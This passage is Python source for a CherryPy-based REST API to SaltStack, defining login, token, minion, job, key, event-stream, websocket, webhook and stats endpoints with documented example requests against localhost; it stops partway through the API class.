tools_config = {
    "on_start_resource": [
        ("html_override", html_override_tool),
        ("salt_token", salt_token_tool),
    ],
    "before_request_body": [
        ("cors_tool", cors_tool),
        ("salt_auth", salt_auth_tool),
        ("hypermedia_in", hypermedia_in),
    ],
    "before_handler": [
        ("lowdata_fmt", lowdata_fmt),
        ("hypermedia_out", hypermedia_out),
        ("salt_ip_verify", salt_ip_verify_tool),
    ],
}
# Register each tool under cherrypy.tools. List position sets the priority
# (50, 51, ...), so within a hook the tools fire in the order written above.
for hook, tool_list in tools_config.items():
    for idx, tool_config in enumerate(tool_list):
        tool_name, tool_fn = tool_config
        setattr(
            cherrypy.tools, tool_name, cherrypy.Tool(hook, tool_fn, priority=(50 + idx))
        )
###############################################################################
class LowDataAdapter:
    """
    The primary entry point to Salt's REST API
    """

    exposed = True

    _cp_config = {
        "tools.salt_token.on": True,
        "tools.sessions.on": True,
        "tools.sessions.timeout": 60 * 10,  # 10 hours (CherryPy uses minutes)
        # 'tools.autovary.on': True,
        "tools.hypermedia_out.on": True,
        "tools.hypermedia_in.on": True,
        "tools.lowdata_fmt.on": True,
        "tools.salt_ip_verify.on": True,
    }

    def __init__(self):
        self.opts = cherrypy.config["saltopts"]
        self.apiopts = cherrypy.config["apiopts"]
        self.api = salt.netapi.NetapiClient(self.opts)

    def exec_lowstate(self, client=None, token=None):
        """
        Pull a Low State data structure from request and execute the low-data
        chunks through Salt. The low-data chunks will be updated to include the
        authorization token for the current session.

        :param client: optional client name forced onto every chunk.
        :param token: optional session auth token forced onto every chunk.
        :return: generator yielding one result per executed chunk.
        :raises cherrypy.HTTPError: 400 for a non-list lowstate, 401 for a
            malformed token.
        """
        lowstate = cherrypy.request.lowstate

        # Release the session lock before executing any potentially
        # long-running Salt commands. This allows different threads to execute
        # Salt commands concurrently without blocking.
        if cherrypy.request.config.get("tools.sessions.on", False):
            cherrypy.session.release_lock()

        # if the lowstate loaded isn't a list, lets notify the client
        if not isinstance(lowstate, list):
            raise cherrypy.HTTPError(400, "Lowstates must be a list")

        # Make any requested additions or modifications to each lowstate, then
        # execute each one and yield the result.
        for chunk in lowstate:
            if token:
                chunk["token"] = token

            # Make sure that auth token is hex. (This identical check
            # appeared twice back-to-back; validating once is sufficient.)
            if "token" in chunk:
                try:
                    int(chunk["token"], 16)
                except (TypeError, ValueError):
                    raise cherrypy.HTTPError(401, "Invalid token")

            if client:
                chunk["client"] = client

            # Make any 'arg' params a list if not already.
            # This is largely to fix a deficiency in the urlencoded format.
            if "arg" in chunk and not isinstance(chunk["arg"], list):
                chunk["arg"] = [chunk["arg"]]

            ret = self.api.run(chunk)

            # Sometimes Salt gives us a return and sometimes an iterator
            if isinstance(ret, Iterator):
                yield from ret
            else:
                yield ret

    @cherrypy.config(**{"tools.sessions.on": False})
    def GET(self):
        """
        An explanation of the API with links of where to go next

        .. http:get:: /

            :reqheader Accept: |req_accept|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000

        .. code-block:: text

            GET / HTTP/1.1
            Host: localhost:8000
            Accept: application/json

        **Example response:**

        .. code-block:: text

            HTTP/1.1 200 OK
            Content-Type: application/json
        """
        return {
            "return": "Welcome",
            "clients": salt.netapi.CLIENTS,
        }

    @cherrypy.tools.salt_token()
    @cherrypy.tools.salt_auth()
    def POST(self, **kwargs):
        """
        Send one or more Salt commands in the request body

        .. http:post:: /

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|
            :reqheader Content-Type: |req_ct|

            :resheader Content-Type: |res_ct|

            :status 200: |200|
            :status 400: |400|
            :status 401: |401|
            :status 406: |406|

            :term:`lowstate` data describing Salt commands must be sent in the
            request body.

        **Example request:**

        .. code-block:: bash

            curl -sSik https://localhost:8000 \\
                -b ~/cookies.txt \\
                -H "Accept: application/x-yaml" \\
                -H "Content-type: application/json" \\
                -d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'

        .. code-block:: text

            POST / HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml
            X-Auth-Token: d40d1e1e
            Content-Type: application/json

            [{"client": "local", "tgt": "*", "fun": "test.ping"}]

        **Example response:**

        .. code-block:: text

            HTTP/1.1 200 OK
            Content-Length: 200
            Allow: GET, HEAD, POST
            Content-Type: application/x-yaml

            return:
            - ms-0: true
              ms-1: true
              ms-2: true
              ms-3: true
              ms-4: true
        """
        return {"return": list(self.exec_lowstate(token=cherrypy.session.get("token")))}
class Minions(LowDataAdapter):
    """
    Convenience URLs for working with minions
    """

    _cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})

    def GET(self, mid=None):  # pylint: disable=arguments-differ
        """
        A convenience URL for getting lists of minions or getting minion
        details

        .. http:get:: /minions/(mid)

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/minions/ms-3

        .. code-block:: text

            GET /minions/ms-3 HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: text

            HTTP/1.1 200 OK
            Content-Length: 129005
            Content-Type: application/x-yaml

            return:
            - ms-3:
                grains.items:
                    ...
        """
        # Query grains for a single minion, or every minion when no id given.
        target = mid or "*"
        cherrypy.request.lowstate = [
            {"client": "local", "tgt": target, "fun": "grains.items"}
        ]
        session_token = cherrypy.session.get("token")
        return {
            "return": list(self.exec_lowstate(token=session_token)),
        }

    def POST(self, **kwargs):
        """
        Start an execution command and immediately return the job id

        .. http:post:: /minions

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|
            :reqheader Content-Type: |req_ct|

            :resheader Content-Type: |res_ct|

            :status 200: |200|
            :status 400: |400|
            :status 401: |401|
            :status 406: |406|

            Lowstate data describing Salt commands must be sent in the request
            body. The ``client`` option will be set to
            :py:meth:`~salt.client.LocalClient.local_async`.

        **Example request:**

        .. code-block:: bash

            curl -sSi localhost:8000/minions \\
                -b ~/cookies.txt \\
                -H "Accept: application/x-yaml" \\
                -d '[{"tgt": "*", "fun": "status.diskusage"}]'

        .. code-block:: text

            POST /minions HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml
            Content-Type: application/json

            tgt=*&fun=status.diskusage

        **Example response:**

        .. code-block:: text

            HTTP/1.1 202 Accepted
            Content-Length: 86
            Content-Type: application/x-yaml

            return:
            - jid: '20130603122505459265'
              minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
            _links:
              jobs:
                - href: /jobs/20130603122505459265
        """
        session_token = cherrypy.session.get("token")
        job_data = list(
            self.exec_lowstate(client="local_async", token=session_token)
        )

        # 202: the work was accepted but is still running.
        cherrypy.response.status = 202

        job_links = [{"href": "/jobs/{}".format(i["jid"])} for i in job_data if i]
        return {
            "return": job_data,
            "_links": {
                "jobs": job_links,
            },
        }
class Jobs(LowDataAdapter):
    """
    Convenience URLs for working with previously run jobs
    """

    _cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})

    def GET(self, jid=None, timeout=""):  # pylint: disable=arguments-differ
        """
        A convenience URL for getting lists of previously run jobs or getting
        the return from a single job

        .. http:get:: /jobs/(jid)

            List jobs or show a single job from the job cache.

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/jobs

        .. code-block:: text

            GET /jobs HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: text

            HTTP/1.1 200 OK
            Content-Length: 165
            Content-Type: application/x-yaml

            return:
            - '20121130104633606931':
                Arguments:
                - '3'
                Function: test.fib
                Start Time: 2012, Nov 30 10:46:33.606931
                Target: jerry
                Target-type: glob

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/jobs/20121130104633606931

        .. code-block:: text

            GET /jobs/20121130104633606931 HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: text

            HTTP/1.1 200 OK
            Content-Length: 73
            Content-Type: application/x-yaml

            info:
            - Arguments:
                - '3'
              Function: test.fib
              Minions:
                - jerry
              Start Time: 2012, Nov 30 10:46:33.606931
              Target: '*'
              Target-type: glob
              User: saltdev
              jid: '20121130104633606931'
            return:
            - jerry:
                - - 0
                - 1
                - 1
                - 2
                - 6.9141387939453125e-06
        """
        # List one specific job, or all cached jobs when no jid is given.
        lowstate = {"client": "runner"}
        if jid:
            lowstate.update({"fun": "jobs.list_job", "jid": jid})
        else:
            lowstate.update({"fun": "jobs.list_jobs"})

        cherrypy.request.lowstate = [lowstate]
        job_ret_info = list(self.exec_lowstate(token=cherrypy.session.get("token")))

        ret = {}
        if jid:
            ret["info"] = [job_ret_info[0]]
            minion_ret = {}
            # Guard against a missing/None "Result" key so a job with no
            # returns yet yields an empty mapping instead of a TypeError.
            returns = job_ret_info[0].get("Result") or {}
            # The original if/else here had two identical branches; a single
            # .get() per minion is equivalent.
            for minion in returns:
                minion_ret[minion] = returns[minion].get("return")
            ret["return"] = [minion_ret]
        else:
            ret["return"] = [job_ret_info[0]]

        return ret
class Keys(LowDataAdapter):
    """
    Convenience URLs for working with minion keys

    .. versionadded:: 2014.7.0

    These URLs wrap the functionality provided by the :py:mod:`key wheel
    module <salt.wheel.key>` functions.
    """

    def GET(self, mid=None):  # pylint: disable=arguments-differ
        """
        Show the list of minion keys or detail on a specific key

        .. versionadded:: 2014.7.0

        .. http:get:: /keys/(mid)

            List all keys or show a specific key

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/keys

        .. code-block:: text

            GET /keys HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: text

            HTTP/1.1 200 OK
            Content-Length: 165
            Content-Type: application/x-yaml

            return:
              local:
              - master.pem
              - master.pub
              minions:
              - jerry
              minions_pre: []
              minions_rejected: []

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/keys/jerry

        .. code-block:: text

            GET /keys/jerry HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: text

            HTTP/1.1 200 OK
            Content-Length: 73
            Content-Type: application/x-yaml

            return:
              minions:
                jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
        """
        # Fingerprint one key when a minion id is given, else list them all.
        if not mid:
            lowstate = [{"client": "wheel", "fun": "key.list_all"}]
        else:
            lowstate = [{"client": "wheel", "fun": "key.finger", "match": mid}]

        cherrypy.request.lowstate = lowstate
        result = self.exec_lowstate(token=cherrypy.session.get("token"))

        return {"return": next(result, {}).get("data", {}).get("return", {})}

    @cherrypy.config(**{"tools.hypermedia_out.on": False, "tools.sessions.on": False})
    def POST(self, **kwargs):
        r"""
        Easily generate keys for a minion and auto-accept the new key

        Accepts all the same parameters as the :py:func:`key.gen_accept
        <salt.wheel.key.gen_accept>`.

        .. note:: A note about ``curl``

            Avoid using the ``-i`` flag or HTTP headers will be written and
            produce an invalid tar file.

        Example partial kickstart script to bootstrap a new minion:

        .. code-block:: text

            %post
            mkdir -p /etc/salt/pki/minion
            curl -sSk https://localhost:8000/keys \
                    -d mid=jerry \
                    -d username=kickstart \
                    -d password=kickstart \
                    -d eauth=pam \
                | tar -C /etc/salt/pki/minion -xf -

            mkdir -p /etc/salt/minion.d
            printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
            %end

        .. http:post:: /keys

            Generate a public and private key and return both as a tarball

            Authentication credentials must be passed in the request.

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -sSk https://localhost:8000/keys \
                    -d mid=jerry \
                    -d username=kickstart \
                    -d password=kickstart \
                    -d eauth=pam \
                    -o jerry-salt-keys.tar

        .. code-block:: text

            POST /keys HTTP/1.1
            Host: localhost:8000

        **Example response:**

        .. code-block:: text

            HTTP/1.1 200 OK
            Content-Length: 10240
            Content-Disposition: attachment; filename="saltkeys-jerry.tar"
            Content-Type: application/x-tar

            jerry.pub0000644000000000000000000000070300000000000010730 0ustar  00000000000000
        """
        lowstate = cherrypy.request.lowstate
        lowstate[0].update({"client": "wheel", "fun": "key.gen_accept"})

        # The wheel module expects "id_" while the HTTP API accepts "mid".
        if "mid" in lowstate[0]:
            lowstate[0]["id_"] = lowstate[0].pop("mid")

        result = self.exec_lowstate()
        ret = next(result, {}).get("data", {}).get("return", {})

        pub_key = ret.get("pub", "")
        priv_key = ret.get("priv", "")

        # Tar member sizes are taken from the text length before encoding,
        # matching the byte length for the ASCII PEM data involved here.
        pub_info = tarfile.TarInfo("minion.pub")
        pub_info.size = len(pub_key)
        priv_info = tarfile.TarInfo("minion.pem")
        priv_info.size = len(priv_key)

        fileobj = io.BytesIO()
        with tarfile.open(fileobj=fileobj, mode="w") as tarball:
            tarball.addfile(
                pub_info, io.BytesIO(pub_key.encode(__salt_system_encoding__))
            )
            tarball.addfile(
                priv_info, io.BytesIO(priv_key.encode(__salt_system_encoding__))
            )

        headers = cherrypy.response.headers
        headers["Content-Disposition"] = 'attachment; filename="saltkeys-{}.tar"'.format(
            lowstate[0]["id_"]
        )
        headers["Content-Type"] = "application/x-tar"
        headers["Content-Length"] = len(fileobj.getvalue())
        headers["Cache-Control"] = "no-cache"

        fileobj.seek(0)
        return fileobj
class Login(LowDataAdapter):
    """
    Log in to receive a session token

    :ref:`Authentication information <rest_cherrypy-auth>`.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.auth = salt.auth.Resolver(self.opts)

    def GET(self):
        """
        Present the login interface

        .. http:get:: /login

            An explanation of how to log in.

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/login

        .. code-block:: text

            GET /login HTTP/1.1
            Host: localhost:8000
            Accept: text/html

        **Example response:**

        .. code-block:: text

            HTTP/1.1 200 OK
            Content-Type: text/html
        """
        cherrypy.response.headers["WWW-Authenticate"] = "Session"

        return {
            "status": cherrypy.response.status,
            "return": "Please log in",
        }

    def POST(self, **kwargs):
        """
        :ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system

        .. http:post:: /login

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|
            :reqheader Content-Type: |req_ct|

            :form eauth: the eauth backend configured for the user
            :form username: username
            :form password: password

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -si localhost:8000/login \\
                -c ~/cookies.txt \\
                -H "Accept: application/json" \\
                -H "Content-type: application/json" \\
                -d '{
                    "username": "saltuser",
                    "password": "saltuser",
                    "eauth": "auto"
                }'

        .. code-block:: text

            POST / HTTP/1.1
            Host: localhost:8000
            Content-Length: 42
            Content-Type: application/json
            Accept: application/json

            {"username": "saltuser", "password": "saltuser", "eauth": "auto"}

        **Example response:**

        .. code-block:: text

            HTTP/1.1 200 OK
            Content-Type: application/json
            Content-Length: 206
            X-Auth-Token: 6d1b722e
            Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/

            {"return": {
                "token": "6d1b722e",
                "start": 1363805943.776223,
                "expire": 1363849143.776224,
                "user": "saltuser",
                "eauth": "pam",
                "perms": [
                    "grains.*",
                    "status.*",
                    "sys.*",
                    "test.*"
                ]
            }}
        """
        if not self.api._is_master_running():
            raise salt.exceptions.SaltDaemonNotRunning("Salt Master is not available.")

        # the urlencoded_processor will wrap this in a list
        lowstate = cherrypy.serving.request.lowstate
        creds = lowstate[0] if isinstance(lowstate, list) else lowstate

        username = creds.get("username", None)
        # Validate against the whitelist.
        if not salt_api_acl_tool(username, cherrypy.request):
            raise cherrypy.HTTPError(401)

        # Mint token.
        token = self.auth.mk_token(creds)
        if "token" not in token:
            raise cherrypy.HTTPError(
                401, "Could not authenticate using provided credentials"
            )

        cherrypy.response.headers["X-Auth-Token"] = cherrypy.session.id
        cherrypy.session["token"] = token["token"]
        # CherryPy session timeout is in minutes; eauth expiry is in seconds.
        cherrypy.session["timeout"] = (token["expire"] - token["start"]) / 60

        # Grab eauth config for the current backend for the current user
        try:
            eauth = self.opts.get("external_auth", {}).get(token["eauth"], {})

            if token["eauth"] == "django" and "^model" in eauth:
                perms = token["auth_list"]
            else:
                # Get sum of '*' perms, user-specific perms, and group-specific perms
                perms = eauth.get(token["name"], []).copy()
                perms.extend(eauth.get("*", []))

                if token.get("groups"):
                    user_groups = set(token["groups"])
                    eauth_groups = {i.rstrip("%") for i in eauth.keys() if i.endswith("%")}

                    for group in user_groups & eauth_groups:
                        perms.extend(eauth["{}%".format(group)])

            if not perms:
                logger.debug("Eauth permission list not found.")
        except Exception:  # pylint: disable=broad-except
            logger.debug(
                "Configuration for external_auth malformed for eauth %r, and user %r.",
                token.get("eauth"),
                token.get("name"),
                exc_info=True,
            )
            perms = None

        return {
            "return": [
                {
                    "token": cherrypy.session.id,
                    "expire": token["expire"],
                    "start": token["start"],
                    "user": token["name"],
                    "eauth": token["eauth"],
                    "perms": perms or {},
                }
            ]
        }
class Logout(LowDataAdapter):
    """
    Class to remove or invalidate sessions
    """

    _cp_config = dict(
        LowDataAdapter._cp_config,
        **{"tools.salt_auth.on": True, "tools.lowdata_fmt.on": False}
    )

    def POST(self):  # pylint: disable=arguments-differ
        """
        Destroy the currently active session and expire the session cookie
        """
        # Expire the cookie on the client, then rotate the server-side session.
        cherrypy.lib.sessions.expire()
        cherrypy.session.regenerate()

        return {"return": "Your token has been cleared"}
class Token(LowDataAdapter):
    """
    Generate a Salt token from eauth credentials

    Wraps functionality in the :py:mod:`auth Runner <salt.runners.auth>`.

    .. versionadded:: 2017.7.0
    """

    @cherrypy.config(**{"tools.sessions.on": False})
    def POST(self, **kwargs):
        r"""
        .. http:post:: /token

            Generate a Salt eauth token

            :status 200: |200|
            :status 400: |400|
            :status 401: |401|

        **Example request:**

        .. code-block:: bash

            curl -sSk https://localhost:8000/token \
                -H 'Content-type: application/json' \
                -d '{
                    "username": "saltdev",
                    "password": "saltdev",
                    "eauth": "auto"
                }'

        **Example response:**

        .. code-block:: text

            HTTP/1.1 200 OK
            Content-Type: application/json

            [{
                "start": 1494987445.528182,
                "token": "e72ca1655d05...",
                "expire": 1495030645.528183,
                "name": "saltdev",
                "eauth": "auto"
            }]
        """
        # Rewrite each credential chunk into a runner call to auth.mk_token.
        for creds in cherrypy.request.lowstate:
            try:
                runner_kwarg = {
                    "username": creds["username"],
                    "password": creds["password"],
                    "eauth": creds["eauth"],
                }
            except KeyError:
                raise cherrypy.HTTPError(
                    400, 'Require "username", "password", and "eauth" params'
                )
            creds.update(
                {
                    "client": "runner",
                    "fun": "auth.mk_token",
                    "kwarg": runner_kwarg,
                }
            )

        return list(self.exec_lowstate())
class Run(LowDataAdapter):
    """
    Run commands bypassing the :ref:`normal session handling
    <rest_cherrypy-auth>`.

    salt-api does not enforce authorization, Salt's eauth system does that.
    Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
    **or** ``token`` kwargs that are then checked by the eauth system. This
    endpoint accepts either form directly in each lowstate chunk and does
    not make use of sessions at all.
    """

    _cp_config = dict(LowDataAdapter._cp_config, **{"tools.sessions.on": False})

    def POST(self, **kwargs):
        """
        Run commands bypassing the :ref:`normal session handling
        <rest_cherrypy-auth>`. Otherwise, this URL is identical to the
        :py:meth:`root URL (/) <LowDataAdapter.POST>`.

        .. http:post:: /run

            An array of lowstate data describing Salt commands must be sent
            in the request body; eauth credentials (or a Salt eauth token)
            must be included in each chunk. The ``ssh`` client is also
            supported here and is always synchronous.

            :status 200: |200|
            :status 400: |400|
            :status 401: |401|
            :status 406: |406|
        """
        # Authentication of each chunk is delegated to Salt's eauth system.
        return {
            "return": list(self.exec_lowstate()),
        }
class Events:
    """
    Expose the Salt event bus

    Provides a real-time window into a running Salt infrastructure as an
    HTTP stream formatted per the Server Sent Events (SSE) spec; each event
    is emitted as a ``tag:``/``data:`` record with the data serialized as
    JSON.

    .. seealso:: :ref:`events`
    """

    exposed = True

    _cp_config = dict(
        LowDataAdapter._cp_config,
        **{
            "response.stream": True,
            "tools.encode.encoding": "utf-8",
            # Auth handled manually below
            "tools.salt_auth.on": False,
            "tools.hypermedia_in.on": False,
            "tools.hypermedia_out.on": False,
        }
    )

    def __init__(self):
        self.opts = cherrypy.config["saltopts"]
        self.resolver = salt.auth.Resolver(self.opts)

    def _is_valid_token(self, auth_token):
        """
        Check if this is a valid salt-api token or valid Salt token

        salt-api tokens are regular session tokens that tie back to a real
        Salt token. Salt tokens are tokens generated by Salt's eauth system.

        :return bool: True if valid, False if not valid.
        """
        # A usable token must be a hex string; None or anything non-hex is
        # rejected up front.
        try:
            int(auth_token, 16)
        except (TypeError, ValueError):
            return False

        # If the token is in our session table it is a salt-api token and
        # the real Salt token lives inside the stored session; otherwise
        # treat it as a raw Salt eauth token.
        session_data, _ = cherrypy.session.cache.get(auth_token, ({}, None))
        salt_token = session_data.get("token", auth_token)

        if not salt_token:
            return False

        # The eauth system does not currently support perms for the event
        # stream, so only existence and expiry are checked, not access.
        resolved = self.resolver.get_token(salt_token)
        return bool(resolved and resolved.get("expire", 0) > time.time())

    def GET(self, token=None, salt_token=None):
        r"""
        An HTTP stream of the Salt master event bus

        This stream is formatted per the Server Sent Events (SSE) spec. Each
        event is formatted as JSON.

        .. http:get:: /events

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|
            :query token: **optional** parameter containing the token
                ordinarily supplied via the X-Auth-Token header, for
                browsers whose EventSource API lacks CORS support. E.g.,
                ``curl -NsS localhost:8000/events?token=308650d``
            :query salt_token: **optional** parameter containing a raw Salt
                *eauth token* (not the token returned from the /login URL).
                E.g., ``curl -NsS localhost:8000/events?salt_token=30742765``

        Note the non-spec ``tag`` field in each record; SSE-compliant
        clients should ignore unknown fields. The stream is asynchronous
        and fast — subscribe before creating events and process records as
        they arrive.
        """
        # Token precedence: explicit query params first, then the session
        # cookie set at login time.
        cookies = cherrypy.request.cookie
        auth_token = token or salt_token
        if not auth_token and "session_id" in cookies:
            auth_token = cookies["session_id"].value

        if not self._is_valid_token(auth_token):
            raise cherrypy.HTTPError(401)

        # Release the session lock before starting the long-running response
        cherrypy.session.release_lock()

        cherrypy.response.headers["Content-Type"] = "text/event-stream"
        cherrypy.response.headers["Cache-Control"] = "no-cache"
        cherrypy.response.headers["Connection"] = "keep-alive"

        def listen():
            """
            Yield Salt events formatted as SSE records
            """
            with salt.utils.event.get_event(
                "master",
                sock_dir=self.opts["sock_dir"],
                opts=self.opts,
                listen=True,
            ) as event:
                stream = event.iter_events(full=True, auto_reconnect=True)
                yield "retry: 400\n"

                while True:
                    # Re-validate on every event so an expired/cleared token
                    # terminates the stream.
                    if not self._is_valid_token(auth_token):
                        logger.debug("Token is no longer valid")
                        break

                    data = next(stream)
                    yield "tag: {}\n".format(data.get("tag", ""))
                    yield "data: {}\n\n".format(salt.utils.json.dumps(data))

        return listen()
class WebsocketEndpoint:
    """
    Open a WebSocket connection to Salt's event bus

    Provides a real-time window into a running Salt infrastructure using
    websocket as the transport mechanism. Clients activate the stream by
    sending ``websocket client ready`` after connecting.

    .. seealso:: :ref:`events`
    """

    exposed = True

    _cp_config = dict(
        LowDataAdapter._cp_config,
        **{
            "response.stream": True,
            "tools.encode.encoding": "utf-8",
            # Auth handled manually below
            "tools.salt_auth.on": False,
            "tools.hypermedia_in.on": False,
            "tools.hypermedia_out.on": False,
            "tools.websocket.on": True,
            "tools.websocket.handler_cls": websockets.SynchronizingWebsocket,
        }
    )

    def __init__(self):
        self.opts = cherrypy.config["saltopts"]
        self.auth = salt.auth.LoadAuth(self.opts)

    def GET(self, token=None, **kwargs):
        """
        Return a websocket connection of Salt's event stream

        .. http:get:: /ws/(token)

            :query format_events: The event stream will undergo server-side
                formatting if the ``format_events`` URL parameter is
                included in the request.
            :reqheader X-Auth-Token: an authentication token from
                :py:class:`~Login`.

            :status 101: switching to the websockets protocol
            :status 401: |401|
            :status 406: |406|

        An authentication token **may optionally** be passed as part of the
        URL for browsers that cannot be configured to send the
        authentication header or cookie, e.g. ``/ws/ffedf49d``.
        """
        # Pulling the session token from an URL param is a workaround for
        # browsers not supporting CORS in the EventSource API.
        if token:
            session_data, _ = cherrypy.session.cache.get(token, ({}, None))
            salt_token = session_data.get("token")
        else:
            salt_token = cherrypy.session.get("token")

        # Manually verify the token
        if not salt_token or not self.auth.get_tok(salt_token):
            raise cherrypy.HTTPError(401)

        # Release the session lock before starting the long-running response
        cherrypy.session.release_lock()

        # A handler is the server side end of the websocket connection. Each
        # request spawns a new instance of this handler
        handler = cherrypy.request.ws_handler

        def event_stream(handler, pipe):
            """
            An iterator to return Salt events (and optionally format them)
            """
            # blocks until send is called on the parent end of this pipe.
            pipe.recv()
            with salt.utils.event.get_event(
                "master",
                sock_dir=self.opts["sock_dir"],
                opts=self.opts,
                listen=True,
            ) as event:
                stream = event.iter_events(full=True, auto_reconnect=True)
                salt_info = event_processor.SaltInfo(handler)

                def signal_handler(signal, frame):
                    os._exit(0)

                signal.signal(signal.SIGTERM, signal_handler)

                while True:
                    data = next(stream)
                    if not data:
                        continue
                    try:  # work around try to decode catch unicode errors
                        if "format_events" in kwargs:
                            salt_info.process(data, salt_token, self.opts)
                        else:
                            handler.send(
                                "data: {}\n\n".format(salt.utils.json.dumps(data)),
                                False,
                            )
                    except UnicodeDecodeError:
                        logger.error(
                            "Error: Salt event has non UTF-8 data:\n%s", data
                        )

        parent_pipe, child_pipe = Pipe()
        handler.pipe = parent_pipe
        handler.opts = self.opts
        # Process to handle asynchronous push to a client.
        # Each GET request causes a process to be kicked off.
        proc = Process(target=event_stream, args=(handler, child_pipe))
        proc.start()
class Webhook:
    """
    A generic web hook entry point that fires an event on Salt's event bus

    External services can POST data to this URL to trigger an event in Salt
    (e.g. Amazon SNS, Jenkins-CI, Travis-CI, or GitHub web hooks). The event
    data is taken from the request body, the :mailheader:`Content-Type`
    header is respected for the payload, and the event tag is
    ``salt/netapi/hook`` plus the remaining URL path — a ``POST`` to
    ``/hook/mycompany/myapp/mydata`` produces the tag
    ``salt/netapi/hook/mycompany/myapp/mydata``.

    .. note:: Be mindful of security

        Salt's Reactor can run any code. A Reactor SLS that responds to a
        hook event is responsible for validating that the event came from a
        trusted source and contains valid data.

        **This is a generic interface and securing it is up to you!**

        Authentication can be selectively disabled for this URL (see
        ``webhook_disable_auth`` in ``__init__``). Follow best practices —
        always use SSL, pass a secret key, restrict the firewall, etc.

    .. seealso:: :ref:`events`, :ref:`reactor <reactor>`
    """

    exposed = True
    tag_base = ["salt", "netapi", "hook"]

    _cp_config = dict(
        LowDataAdapter._cp_config,
        **{
            # Don't do any lowdata processing on the POST data
            "tools.lowdata_fmt.on": True,
            # Auth can be overridden in __init__().
            "tools.salt_auth.on": True,
        }
    )

    def __init__(self):
        self.opts = cherrypy.config["saltopts"]
        self.event = salt.utils.event.get_event(
            "master",
            sock_dir=self.opts["sock_dir"],
            opts=self.opts,
            listen=False,
        )

        if cherrypy.config["apiopts"].get("webhook_disable_auth"):
            self._cp_config["tools.salt_auth.on"] = False

    def POST(self, *args, **kwargs):
        """
        Fire an event in Salt with a custom event tag and data

        .. http:post:: /hook

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|
            :status 413: request body is too large

        The fired event carries the raw request body, the parsed POST data,
        and the request headers, so a Reactor SLS can validate e.g. a
        secret-key header before acting.
        """
        hook_tag = "/".join(itertools.chain(self.tag_base, args))

        payload = cherrypy.serving.request.unserialized_data
        if not payload:
            payload = {}
        raw_body = getattr(cherrypy.serving.request, "raw_body", "")
        headers = dict(cherrypy.request.headers)

        fired = self.event.fire_event(
            {"body": raw_body, "post": payload, "headers": headers}, hook_tag
        )
        return {"success": fired}
class Stats:
    """
    Expose statistics on the running CherryPy server
    """

    exposed = True

    _cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})

    def __init__(self):
        # Auth for this URL can be switched off via configuration.
        if cherrypy.config["apiopts"].get("stats_disable_auth"):
            self._cp_config["tools.salt_auth.on"] = False

    def GET(self):
        """
        Return a dump of statistics collected from the CherryPy server

        .. http:get:: /stats

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|

            :resheader Content-Type: |res_ct|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|
        """
        if not hasattr(logging, "statistics"):
            return {}
        return cpstats.extrapolate_statistics(logging.statistics)
class App:
    """
    Class to serve HTML5 apps
    """

    exposed = True

    def GET(self, *args):
        """
        Serve a single static file ignoring the remaining path

        This is useful in combination with a browser-based app using the
        HTML5 history API.

        .. http:get:: /app

            :reqheader X-Auth-Token: |req_token|

            :status 200: |200|
            :status 401: |401|
        """
        apiopts = cherrypy.config["apiopts"]

        # Fall back to the bundled index.html when no app path is configured.
        fallback = os.path.abspath(
            os.path.join(os.path.dirname(__file__), "index.html")
        )
        return cherrypy.lib.static.serve_file(apiopts.get("app", fallback))
class API:
    """
    Collect configuration and URL map for building the CherryPy app
    """

    url_map = {
        "index": LowDataAdapter,
        "login": Login,
        "logout": Logout,
        "token": Token,
        "minions": Minions,
        "run": Run,
        "jobs": Jobs,
        "keys": Keys,
        "events": Events,
        "stats": Stats,
    }

    def __init__(self):
        self.opts = cherrypy.config["saltopts"]
        self.apiopts = cherrypy.config["apiopts"]
        self._update_url_map()
        self._setattr_url_map()

    def _setattr_url_map(self):
        """
